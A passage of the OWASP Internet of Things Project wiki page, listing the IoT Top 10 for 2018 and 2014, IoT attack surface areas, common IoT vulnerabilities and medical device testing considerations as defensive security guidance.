The Industrial Internet Consortium is the open membership, international not-for-profit consortium that is setting the architectural framework and direction for the Industrial Internet. Founded by AT&T, Cisco, GE, IBM and Intel in March 2014, the consortium’s mission is to coordinate vast ecosystem initiatives to connect and integrate objects with people, processes and data using common architectures, interoperability and open standards.<br />
<br />
[http://securingsmartcities.org/ Securing Smart Cities]<br />
<br />
Securing Smart Cities is a not-for-profit global initiative that aims to solve the existing and future cybersecurity problems of smart cities through collaboration between companies, governments, media outlets, other not-for-profit initiatives and individuals across the world.<br />
<br />
===Talks===<br />
<br />
RSA Conference San Francisco <br> <br />
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf Securing the Internet of Things: Mapping IoT Attack Surface Areas with the OWASP IoT Top 10 Project] <br><br />
Daniel Miessler, Practice Principal <br><br />
April 21, 2015 <br><br />
--- <br><br />
Defcon 23 <br><br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping] <br><br />
Daniel Miessler <br><br />
August 6-9, 2015<br />
<br />
===Podcasts===<br />
<br />
* [http://iotpodcast.com/ The Internet of Things Podcast]<br />
* [http://www.iot-inc.com/ IoT Inc]<br />
* [https://craigsmith.net/iot-this-week/ IoT This Week]<br />
* [http://farstuff.com/ Farstuff: The Internet of Things Podcast]<br />
<br />
===IoT Conferences===<br />
<br />
* [http://www.iotevents.org Internet of Things Events]<br />
<br />
Conference Call for Papers<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=internet+of+things&year=t WikiCFP - Internet of Things]<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=iot&year=t WikiCFP - IoT]<br />
<br />
<br />
<br />
=Project About=<br />
<br />
{{Template:Project About<br />
| project_name =OWASP Internet of Things Project<br />
| project_description = <br />
| project_license =CC-BY 3.0 for documentation and GPLv3 for code. <br />
| leader_name1 = Daniel Miessler<br />
| leader_email1 = <br />
| leader_username1 = <br />
| leader_name2 =Craig Smith<br />
| leader_email2 = <br />
| leader_username2 = <br />
| contributor_name1 = Justin Klein Keane]<br />
| contributor_email1 = <br />
| contributor_username1 = Justin_C._Klein_Keane<br />
| contributor_name2 = Yunsoul<br />
| contributor_email2 = <br />
| contributor_username2 = Yunsoul<br />
| mailing_list_name = <br />
| links_url1 = <br />
| links_name1 =<br />
}} <br />
<br />
<br />
<br />
__NOTOC__ <headertabs></headertabs><br />
<br />
[[Category:OWASP_Project]] <br />
[[Category:OWASP_Document]] <br />
[[Category:OWASP_Download]] <br />
[[Category:OWASP_Release_Quality_Document]]</div>Aaron.guzmanhttps://wiki.owasp.org/index.php?title=OWASP_Internet_of_Things_Project&diff=246185OWASP Internet of Things Project2018-12-19T23:54:08Z<p>Aaron.guzman: /* Contributors */</p>
<hr />
<div>= Main =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
== OWASP Internet of Things (IoT) Project ==<br />
Oxford defines the Internet of Things as: “A proposed development of the Internet in which everyday objects have network connectivity, allowing them to send and receive data.”<br />
<br />
''The OWASP Internet of Things Project is designed to help manufacturers, developers, and consumers better understand the security issues associated with the Internet of Things, and to enable users in any context to make better security decisions when building, deploying, or assessing IoT technologies''. <br />
<br />
The project looks to define a structure for various IoT sub-projects such as Attack Surface Areas, Testing Guides and Top Vulnerabilities.<br />
<br />
==Updated!==<br />
<br />
The OWASP IoT Project for 2018 has just been released!<br />
<br />
[[File:2018 IoT Top10.png|center|thumb|1290x1290px]]<br />
<br />
== Philosophy ==<br />
The OWASP Internet of Things Project was started in 2014 as a way help Developers, Manufacturers, Enterprises, and Consumers to make better decisions regarding the creation and use of IoT systems.<br />
<br />
This continues today with the 2018 release of the OWASP IoT Top 10, which represents the top ten things to avoid when building, deploying, or managing IoT systems. The primary theme for the 2018 OWASP Internet of Things Top 10 is simplicity. Rather than having separate lists for risks vs. threats vs. vulnerabilities—or for developers vs. enterprises vs. consumers—the project team elected to have a single, unified list that captures the top things to avoid when dealing with IoT Security.<br />
<br />
The team recognized that there are now dozens of organizations releasing elaborate guidance on IoT Security—all of which are designed for slightly different audiences and industry verticals. We thought the most useful resource we could create is a single list that addresses the highest priority issues for manufacturers, enterprises, and consumers at the same time.<br />
<br />
The result is the 2018 OWASP IoT Top 10.<br />
<br />
== Methodology ==<br />
The project team is a collection of volunteer professionals from within the security industry, with experience spanning multiple areas of expertise, including: manufacturers, consulting, security testers, developers, and many more.<br />
<br />
The project was conducted in the following phases:<br />
# '''Team Formation''': finding people who would be willing to contribute to the 2018 update, both as SMEs and as project leaders to perform various tasks within the duration of the project.<br />
# '''Project Review:''' analysis of the 2014 project to determine what’s changed in the industry since that release, and how the list should be updated given those changes.<br />
# '''Data Collection''': collection and review of multiple vulnerability sources (both public and private), with special emphasis on which issues caused the most actual impact and damage.<br />
# '''Sister Project Review''': a review of dozens of other IoT Security projects to ensure that we’d not missed something major and that we were comfortable with both the content and prioritization of our release. Examples included: [https://cloudsecurityalliance.org/artifacts/csa-iot-controls-matrix/ CSA IoT Controls Matrix], [https://api.ctia.org/wp-content/uploads/2018/08/CTIA-IoT-Cybersecurity-Certification-Test-Plan-V1_0.pdf CTIA], [http://iot.stanford.edu/ Stanford’s Secure Internet of Things Project], [https://nvlpubs.nist.gov/nistpubs/ir/2018/NIST.IR.8200.pdf NISTIR 8200], [https://www.enisa.europa.eu/publications/baseline-security-recommendations-for-iot/at_download/fullReport ENISA IoT Baseline Report], [https://assets.publishing.service.gov.uk/government/uploads/system/uploads/attachment_data/file/747413/Code_of_Practice_for_Consumer_IoT_Security_October_2018.pdf Code of Practice for Consumer IoT Security,] and others.<br />
# '''Community Draft Feedback''': release of the draft to the community for review, including multiple Twitter calls for comments, the use of a public feedback form, and a number of public talks where feedback was gathered. The feedback was then reviewed by the team along with initial Data Collection, as well as Sister Project Review, to create the list contents and prioritization.<br />
# '''Release:''' release of the project to the public in December 2018.<br />
<br />
== The Future of the OWASP IoT Top 10 ==<br />
The team has a number of activities planned to continue improving on the project going forward.<br />
<br />
Some of the items being discussed include:<br />
* Continuing to improve the list on a two-year cadence, incorporating feedback from the community and from additional project contributors to ensure we are staying current with issues facing the industry.<br />
* Mapping the list items to other OWASP projects, such as the ASVS, and perhaps to other projects outside OWASP as well.<br />
* Expanding the project into other aspects of IoT—including embedded security, ICS/ SCADA,etc.<br />
* Adding use and abuse cases, with multiple examples, to solidify each concept discussed.<br />
* Considering the addition of reference architectures, so we can not only tell people what to avoid, but how to do what they need to do securely.<br />
<br />
Participation in the OWASP IoT Project is open to the community. We take input from all participants — whether you’re a developer, a manufacturer, a penetration tester, or someone just trying to implement IoT securely. You can find the team meeting every other Friday in the the #iot-security room of the OWASP Slack Channel.<br />
<br />
'''''The OWASP IoT Security Team, 2018'''''<br />
<br />
==Licensing==<br />
The OWASP Internet of Things Project is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the OWASP Internet of Things Project? ==<br />
<br />
The OWASP Internet of Things Project provides information on:<br />
<br />
* [https://www.owasp.org/index.php/IoT_Attack_Surface_Areas IoT Attack Surface Areas]<br />
* IoT Vulnerabilities<br />
* Firmware Analysis<br />
* ICS/SCADA Software Weaknesses<br />
* Community Information<br />
* [https://www.owasp.org/index.php/IoT_Testing_Guides IoT Testing Guides]<br />
* [https://www.owasp.org/index.php/IoT_Security_Guidance IoT Security Guidance]<br />
* [https://www.owasp.org/index.php/Principles_of_IoT_Security Principles of IoT Security]<br />
* [https://www.owasp.org/index.php/IoT_Framework_Assessment IoT Framework Assessment]<br />
* Developer, Consumer and Manufacturer Guidance<br />
* Design Principles<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Contributors ==<br />
* [https://www.owasp.org/index.php/User:Justin_C._Klein_Keane Justin Klein Keane]<br />
* Saša Zdjelar<br />
<br />
== IoT Top 2018 Contributors ==<br />
Vishruta Rudresh<br />
<br />
Vijayamurugan Pushpanathan <br />
<br />
Aaron Guzman <br />
<br />
Alexander Lafrenz <br />
<br />
Masahiro Murashima <br />
<br />
Charlie Worrell <br />
<br />
José A. Rivas (jarv) <br />
<br />
Pablo Endres <br />
<br />
Ade Yoseman <br />
<br />
Cédric LEVY-BENCHEOTN Jason Andress<br />
<br />
Amélie Didion - Designer<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Project|OWASP Project Repository]]<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security]<br />
* [https://www.owasp.org/index.php/C-Based_Toolchain_Hardening OWASP C-based Toolchain Hardening]<br />
<br />
| style="padding-left:25px;width:200px;" valign="top" |<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The OWASP Slack Channel]<br />
<br />
Hint: If you're new to Slack, [https://lists.owasp.org/pipermail/owasp-community/2015-July/000703.html join OWASP's slack channel first], then join #iot-security within OWASP's channel.<br />
<br />
== Quick Download ==<br />
[https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top Ten 2018]<br />
<br />
[https://1drv.ms/v/s!AucQMYXJNefdwAwa5IPz2cg3cvWe OWASP IoT 2018 Planning Session]<br />
<br />
[https://www.owasp.org/images/7/7b/IoT_Preso_v1.pptx Quick discussion on IoT]<br />
<br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping DEFCON 23]<br />
<br />
[https://www.owasp.org/images/2/2d/Iot_testing_methodology.JPG IoT Testing Guidance Handout]<br />
<br />
[https://www.owasp.org/images/7/71/Internet_of_Things_Top_Ten_2014-OWASP.pdf OWASP IoT Top Ten PDF]<br />
<br />
[https://www.owasp.org/images/8/8e/Infographic-v1.jpg OWASP IoT Top Ten Infographic]<br />
<br />
[https://www.owasp.org/images/0/01/Internet_of_Things_Top_Ten_2014-OWASP-ppt.pptx OWASP IoT Top Ten PPT]<br />
<br />
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf OWASP IoT Top Ten-RSA 2015]<br />
<br />
[https://www.owasp.org/images/b/bd/OWASP-IoT.pptx OWASP IoT Project Overview]<br />
<br />
== News and Events ==<br />
* [https://1drv.ms/v/s!AucQMYXJNefdwAwa5IPz2cg3cvWe OWASP IoT 2018 Planning Session]<br />
* Added a [https://owasp-iot-security.slack.com/ Slack channel]<br />
* Added a sub-project; [https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=IoT_Security_Policy_Project IoT Security Policy Project]<br />
* Daniel Miessler gave his [https://www.youtube.com/watch?v=RhxHHD790nw IoT talk at DEFCON 23]<br />
* Migrating the IoT Top Ten to be under the IoT Project<br />
* HP Study Reveals 70 Percent of Internet of Things Devices Vulnerable to Attack<br />
<br />
==Classifications==<br />
<br />
{| width="200" cellpadding="2"<br />
|-<br />
| rowspan="2" width="50%" valign="top" align="center" | [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]<br />
| width="50%" valign="top" align="center" | [[File:Owasp-builders-small.png|link=]] <br />
|-<br />
| width="50%" valign="top" align="center" | [[File:Owasp-defenders-small.png|link=]]<br />
|-<br />
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]<br />
|-<br />
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]<br />
|}<br />
<br />
|}<br />
<br />
= IoT Top 10 =<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
== Internet of Things (IoT) Top 10 2018 ==<br />
The [https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top 10 - 2018] is now available.<br />
* I1 Weak Guessable, or Hardcoded Passwords<br />
<br />
* I2 Insecure Network Services<br />
<br />
* I3 Insecure Ecosystem Interfaces<br />
<br />
* I4 Lack of Secure Update Mechanism<br />
<br />
* I5 Use of Insecure or Outdated Components<br />
<br />
* I6 Insufficient Privacy Protection<br />
<br />
* I7 Insecure Data Transfer and Storage<br />
<br />
* I8 Lack of Device Management<br />
<br />
* I9 Insecure Default Settings<br />
<br />
* I10 Lack of Physical Hardening<br />
== Internet of Things (IoT) Top 10 2014 ==<br />
* [[Top 10 2014-I1 Insecure Web Interface|I1 Insecure Web Interface]]<br />
* [[Top 10 2014-I2 Insufficient Authentication/Authorization|I2 Insufficient Authentication/Authorization]]<br />
* [[Top 10 2014-I3 Insecure Network Services|I3 Insecure Network Services]]<br />
* [[Top 10 2014-I4 Lack of Transport Encryption|I4 Lack of Transport Encryption]]<br />
* [[Top 10 2014-I5 Privacy Concerns|I5 Privacy Concerns]]<br />
* [[Top 10 2014-I6 Insecure Cloud Interface|I6 Insecure Cloud Interface]]<br />
* [[Top 10 2014-I7 Insecure Mobile Interface|I7 Insecure Mobile Interface]]<br />
* [[Top 10 2014-I8 Insufficient Security Configurability|I8 Insufficient Security Configurability]]<br />
* [[Top 10 2014-I9 Insecure Software/Firmware|I9 Insecure Software/Firmware]]<br />
* [[Top 10 2014-I10 Poor Physical Security|I10 Poor Physical Security]]<br />
<br />
= IoT Attack Surface Areas =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Attack Surface Areas Project ==<br />
<br />
The OWASP IoT Attack Surface Areas (DRAFT) are as follows:<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
** UART (Serial)<br />
** JTAG / SWD<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure ([[Top 10 2013-A6-Sensitive Data Exposure|See OWASP Top 10 - A6 Sensitive data exposure]]):<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
** Verify for old sw versions and possible attacks (Heartbleed, Shellshock, old PHP versions etc)<br />
* Security related function API exposure<br />
* Firmware downgrade possibility<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Firmware loaded over insecure channel (no TLS)<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Check for insecure direct object references<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of static same enc/dec key<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-wave, XBee, Zigbee, Bluetooth, LoRA)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reusing of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Privacy'''<br />
|<br />
* User data disclosure<br />
* User/device location disclosure<br />
* Differential privacy<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damage (Physicall)<br />
<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Attack Surface Areas Project? ==<br />
<br />
The IoT Attack Surface Areas Project provides a list of attack surfaces that should be understood by manufacturers, developers, security researchers, and those looking to deploy or implement IoT technologies within their organizations.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_Mobile_Security_Project The OWASP Mobile Top 10 Project]<br />
* [https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project The OWASP Web Top 10 Project]<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Vulnerabilities =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Vulnerabilities Project ==<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Vulnerability<br />
! Attack Surface<br />
! Summary<br />
|-<br />
| '''Username Enumeration'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to collect a set of valid usernames by interacting with the authentication mechanism<br />
|-<br />
| '''Weak Passwords'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to set account passwords to '1234' or '123456' for example.<br />
* Usage of pre-programmed default passwords<br />
|-<br />
| '''Account Lockout'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to continue sending authentication attempts after 3 - 5 failed login attempts<br />
|-<br />
| '''Unencrypted Services'''<br />
|<br />
* Device Network Services<br />
|<br />
* Network services are not properly encrypted to prevent eavesdropping or tampering by attackers<br />
|-<br />
| '''Two-factor Authentication'''<br />
|<br />
* Administrative Interface<br />
* Cloud Web Interface<br />
* Mobile Application<br />
|<br />
* Lack of two-factor authentication mechanisms such as a security token or fingerprint scanner<br />
|-<br />
| '''Poorly Implemented Encryption'''<br />
|<br />
* Device Network Services<br />
|<br />
* Encryption is implemented however it is improperly configured or is not being properly updated, e.g. using SSL v2 <br />
|-<br />
| '''Update Sent Without Encryption'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Updates are transmitted over the network without using TLS or encrypting the update file itself<br />
|-<br />
| '''Update Location Writable'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Storage location for update files is world writable potentially allowing firmware to be modified and distributed to all users<br />
|-<br />
| '''Denial of Service'''<br />
|<br />
* Device Network Services<br />
|<br />
* Service can be attacked in a way that denies service to that service or the entire device<br />
|-<br />
| '''Removal of Storage Media'''<br />
|<br />
* Device Physical Interfaces<br />
|<br />
* Ability to physically remove the storage media from the device<br />
|-<br />
| '''No Manual Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to manually force an update check for the device<br />
|-<br />
| '''Missing Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to update device<br />
|-<br />
| '''Firmware Version Display and/or Last Update Date'''<br />
|<br />
* Device Firmware<br />
|<br />
* Current firmware version is not displayed and/or the last update date is not displayed<br />
|-<br />
| '''Firmware and storage extraction'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://www.flashrom.org/Flashrom In-Situ dumping]<br />
* Intercepting a OTA update<br />
* Downloading from the manufacturers web page<br />
* [https://www.exploitee.rs/index.php/Exploitee.rs_Low_Voltage_e-MMC_Adapter eMMC tapping]<br />
* Unsoldering the SPI Flash / eMMC chip and reading it in a adapter<br />
|<br />
* Firmware contains a lot of useful information, like source code and binaries of running services, pre-set passwords, ssh keys etc. <br />
|-<br />
| '''Manipulating the code execution flow of the device'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://wiki.newae.com/Main_Page Side channel attacks like glitching]<br />
|<br />
* With the help of a JTAG adapter and gdb we can modify the execution of firmware in the device and bypass almost all software based security controls.<br />
* Side channel attacks can also modify the execution flow or can be used to leak interesting information from the device<br />
|-<br />
| '''Obtaining console access'''<br />
|<br />
* Serial interfaces (SPI / UART)<br />
|<br />
* By connecting to a serial interface, we will obtain full console access to a device<br />
* Usually security measures include custom bootloaders that prevent the attacker from entering single user mode, but that can also be bypassed.<br />
|-<br />
| '''Insecure 3rd party components'''<br />
|<br />
* Software<br />
|<br />
* Out of date versions of busybox, openssl, ssh, web servers, etc.<br />
|-<br />
<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Vulnerabilities Project? ==<br />
<br />
The IoT Vulnerabilities Project provides:<br />
<br />
* Information on the top IoT vulnerabilities<br />
* The attack surface associated with the vulnerability<br />
* A summary of the vulnerability<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/Top_IoT_Vulnerabilities Top 10 IoT Vulnerabilities from 2014]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= Medical Devices =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Medical Device Testing ==<br />
<br />
The Medical Device Testing project is intended to provide some basic attack surface considerations that should be evaluated before shipping Medical Device equipment.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''HL7'''<br />
|<br />
* XML Parsing<br />
** XSS<br />
* Information Disclosure<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure:<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
* Security related function API exposure<br />
* Firmware downgrade<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of static same enc/dec key<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
